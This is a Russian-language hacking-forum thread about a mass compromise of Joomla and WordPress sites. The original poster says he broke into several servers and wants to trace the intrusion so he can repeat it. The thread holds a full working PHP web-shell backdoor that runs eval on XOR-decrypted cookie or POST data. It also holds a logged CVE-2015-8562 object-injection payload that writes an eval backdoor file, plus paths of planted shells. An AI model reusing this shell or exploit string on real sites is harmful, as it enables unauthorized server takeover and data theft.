Охота за хакером

Discussion in 'Песочница' started by nitupme, 10 Mar 2017.

  1. nitupme

    nitupme Member

    Joined:
    10 Oct 2015
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
    Охота за хакером!
    ОЧЕНЬ ИНЕРЕСНАЯ ТЕМА, КОПАЮ УЖЕ НЕДЕЛЮ.....
    п1.
    вобщем летом 2016 были атакованы миллионы сайтов joomla и wp
    https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html


    А так же:
    в joomla прописан супер пользователь Service без мыла с правами супер админа и логин вида
    joomla.user.helper.8r4KW - пароль не брутится
    на всех линейках до последней версии !!! 1.5 , 2.5 и 3.6.5
    где прописан такой пользователь, есть вирус п.1

    пользователь заригистрирован
    в j15 - в октябре 2016
    в 3 - в январе 2017

    А ТАКЖЕ: практически везде есть такой шелл.
    http://www.bugscan.net/combbs/topics/476/template/

    есть руты 6 серверов, где встречаются пользователи
    на 1 сервере есть логи с июня 2016

    есть рут одного из серваков, который присутствует в файле query.min.php (который инжектит вирус п.1)

    раскопав точку проникновения, можно повторить п.1

    кто со мной - пишите в личку.

    #346
     
  2. Danya_88

    Danya_88 New Member

    Joined:
    11 Mar 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    охота, это хорошее дело...
     
  3. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,025
    Likes Received:
    3,355
    Reputations:
    72
    А ты случайно не казачок ли засланный?
     
  4. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    423
    Likes Received:
    585
    Reputations:
    52
    Лолирую с топика. Если не знал, то массовый взлом сайтов - обычное явление на шаред-хостинге. А если выражаться точнее то это баян баянистый. Этот процесс происходит уже лет 10 наверно. Из своего опыта могу сказать, что минимум 10% всех сайтов на жумле и вордпрессе уже взломаны кем-то.
    Малварь распространяется автоматически. Залился вирус на сайт и тут-же этот вирус начинает сканировать другие сайты и так до бесконечности.

    Если ты думал, что открыл Америку то ошибаешься. Смотреть как ломают говносайты другие и повторять за ними - этим уже занимаются тысячи кулхацкеров.
     
    bencann likes this.
  5. nitupme

    nitupme Member

    Joined:
    10 Oct 2015
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
    Да ты гений просто, 'залился вирус на сайт'. Ясен хуй что вручную на миллионы сайтов никто не вкачивал, вот меня и интересует техническая сторона именно этого случая.
    Я тоже вслед залился и зарутал некоторые сервера, нужна помощь в расшифровке - логов и файлов, чтобы понять как он залился.
     
  6. nitupme

    nitupme Member

    Joined:
    10 Oct 2015
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
    к примеру как работает это шелл
    <?php
    @ini_set("error_log", NULL);
    @ini_set("log_errors", 0);
    @ini_set("max_execution_time", 0);
    @set_time_limit(0);
    $data = NULL;
    $data_key = NULL;
    $GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
    global $auth;

    function sh_decrypt_phase($data, $key) {
    $out_data = "";
    for ($i = 0; $i < strlen($data) {
    $jplufmtpaem = "i";
    for ($j = 0;$j < strlen($key) && $i < strlen($data); $j++, $i++) {
    $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
    }
    }
    return $out_data;
    }

    function sh_decrypt($data, $key) {
    global $auth;
    return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key);
    }

    foreach($_COOKIE as $key => $value) {
    $data = $value;
    $data_key = $key;
    }

    if(!$data) {
    foreach($_POST as $key => $value) {
    $data = $value;
    $data_key = $key;
    }
    }
    $data = @unserialize(sh_decrypt(@base64_decode( $data ) , $data_key ));

    if (isset($data["ak"]) && $auth == $data["ak"]) {
    if ($data["a"] == "i") {
    $i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
    echo @serialize($i);
    }
    elseif ($data["a"] == "e") {
    eval($data["d"]);
    }
    }

    ?>
     
  7. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    423
    Likes Received:
    585
    Reputations:
    52
    А что такого я сказал? Всё именно так. Просто вирус, просто залился, просто на говносайт. Вот и всё. Банальный eval() которому на выполнение подают код расксореный ключём $GLOBALS["auth"]. Кстати, судя по коду писал его нуб.

    Ага. Чтобы понять как он залился и начать заливать самому, да?

    Понять как он залился после того как он уже залился ты не сможешь. Потому что веб-сервер логирует только айпишник, юзер-агент и URI запроса. В большинстве случаев http-запрос на выполнение кода отправляется POST-запросом. В лог попадают только GET-параметры а набор POST-параметров (по которым и можно понять как взломали сайт) не логируется.

    Можно только сделать honeypot на жумле который будет логировать все http-запросы со всеми их параметрами. Но это превентивная мера а ты предлагаешь изучать последствия уже взломанных сайтов.

    Логи тебе ничего не дадут по причине вышесказанного. Можно только найти URI по которому был сделан POST-запрос и, если повезёт, то он будет специфическим и по нему можно будет нагуглить описание дыры в жумле. В самом идеальном и невероятном случае сайт взломан GET-запросом, при этом естественно его параметры попадут в лог, но это крайняя редкость.
    Если ты собрался рассылать малварь по инэту то зря стараешься. Проще не смотреть как делает кто-то а находить топовые уязвимости и сканировать веб по ним.
     
    moonden, crlf, altblitz and 1 other person like this.
  8. nitupme

    nitupme Member

    Joined:
    10 Oct 2015
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
    вот тут hxxp://rniiap.ru/forum/profile/1769-joomla-user-helper-cisev.html - последняя версия между прочем - является супердмином, созданным в результате запроса к базе данных.
    при создании было обращение к файлу на серваке. В логах это пишется, к какому файлу было обращение.
    этот юзер нигде никогда не заходил

    ниже - сайт другой, версия другая, но юзер - аналогичный
    между прочим вот твой редкий случай - вот он заливает шелл НО ЭТО БЫЛ НЕ ОН ! это CVE-2015-8562 и не работает на этом серваке...
    ========================
    "GET / HTTP/1.1" 200 43723 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:237:\"file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"admim.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['gtr'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9"
    =====================
    отстальные запросы были:
    "GET /administrator/components/com_installer/akdjxnk/rxttekb.php 6B
    "GET /components/com_rokquickcart/assets/gallery45.php
    "GET /images/stories/postelnie/TWINS/dir.php
    "GET /includes/js/jscalendar-1.0/session.php
    "GET /media/shop/admin_files/html/admin.function_form.php
    "GET /modules/mod_newsflash/helper.php
    "GET /modules/mod_virtuemart/vm_transmenu/img/javascript.php
    "POST /administrator/components/com_categories/toolbar.categories.html.php
    "POST /administrator/components/com_config/toolbar.config.html.php
    "POST /administrator/components/com_installer/akdjxnk/rxttekb.php
    "POST /components/com_poll/assets/plugin27.php
    "POST /components/com_rokquickcart/assets/gallery45.php
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Это снифер по кукам и пост запросам с элементом бэгдора. цель шифрования для защиты уже перехваченных данных от сторонних глаз, следовательно данные могут иметь весомое значение! тут явно код не закончен.
     
    _________________________
Loading...
Similar Threads - Охота хакером
  1. raarkil
    Replies:
    4
    Views:
    2,402